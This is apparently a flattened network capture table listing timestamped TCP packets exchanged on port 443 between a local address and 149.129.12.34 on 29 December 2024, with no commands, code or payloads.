                                                                                                                                                                                                            Dec 29, 2024 09:02:02.051815987 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.051872015 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100816011 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100837946 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100902081 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100939035 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100995064 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.100995064 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144685030 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144706011 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144753933 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144779921 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144824028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.144845963 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.175288916 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.175319910 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.175395966 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.175415993 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.175472021 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187441111 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187459946 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187524080 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187539101 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187566996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.187586069 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.194863081 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.194883108 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.194943905 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.194960117 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.195024967 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203274965 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203293085 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203347921 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203363895 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203417063 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.203417063 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210870028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210897923 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210942030 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.210966110 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.211108923 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.211108923 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.218982935 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219001055 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219177961 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219192028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.219244957 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227233887 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227252960 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227324009 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227339029 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.227406979 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.329910040 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.329941034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330125093 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330149889 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.330193996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363109112 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363137007 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363228083 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363244057 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.363286972 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368046999 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368068933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368140936 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368149042 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.368185997 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373661041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373684883 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373720884 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373730898 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373758078 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.373778105 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379295111 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379327059 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379353046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379359961 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379381895 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.379399061 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384270906 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384294987 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384330034 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384335995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.384375095 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390227079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390244007 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390280962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390286922 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.390324116 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396853924 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396882057 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396919012 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396925926 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.396962881 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520390034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520421982 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520556927 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520582914 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.520621061 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.554578066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.554610014 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555027962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555035114 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.555073023 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560154915 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560174942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560348034 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560354948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.560396910 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565798044 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565817118 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565891027 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565897942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.565932989 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570786953 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570806026 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570849895 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570856094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570882082 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.570899963 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576433897 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576452971 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576504946 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576510906 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.576544046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581763983 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581784010 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581847906 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581854105 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.581888914 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588535070 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588555098 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588593006 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588598967 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588625908 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.588644028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712575912 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712599993 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712646961 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712656021 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712682962 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.712701082 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.747243881 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.747266054 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.747307062 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.747320890 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.747365952 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.752816916 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.752835989 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.752896070 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.752902031 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.752939939 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.757817030 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.757834911 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.757870913 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.757877111 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.757914066 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763505936 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763525963 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763551950 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763559103 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763595104 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.763619900 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769062996 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769082069 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769120932 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769126892 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769155979 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.769176006 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774493933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774513006 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774552107 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774558067 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774588108 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.774602890 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.780689955 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.780709028 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.780771971 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.780778885 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.780818939 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907701015 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907728910 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907764912 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907772064 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907798052 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.907814026 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.939662933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.939685106 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.939716101 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.939719915 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.939757109 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.944597006 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.944616079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.944649935 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.944655895 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.944693089 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.950112104 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.950130939 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.950176954 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.950184107 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.950221062 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.955801964 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.955821991 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.955879927 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.955884933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.955918074 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.960784912 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.960810900 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.960841894 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.960846901 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.960886955 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966769934 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966788054 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966819048 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966840982 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966855049 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.966875076 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.972839117 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.972857952 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.972891092 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.972898006 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:02.972929001 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100271940 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100306034 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100366116 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100450039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100497961 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.100497961 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133420944 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133450031 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133492947 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133517981 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133546114 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.133563995 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.138628960 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.138653040 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.138706923 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.138725996 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.138782024 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144260883 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144284010 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144326925 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144340992 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144370079 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.144387960 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149229050 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149252892 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149310112 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149333954 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149363041 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.149384022 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.154892921 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.154912949 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.154958963 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.154992104 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.155019999 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.155036926 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160170078 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160188913 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160238028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160252094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160301924 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.160301924 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.165988922 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166016102 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166058064 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166078091 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166105986 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.166126966 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293566942 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293586969 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293908119 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293936014 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.293981075 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325242996 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325263023 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325577974 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325592041 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.325634956 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330528975 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330543995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330605984 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:03.330612898 CET44349735149.129.12.34192.168.2.4
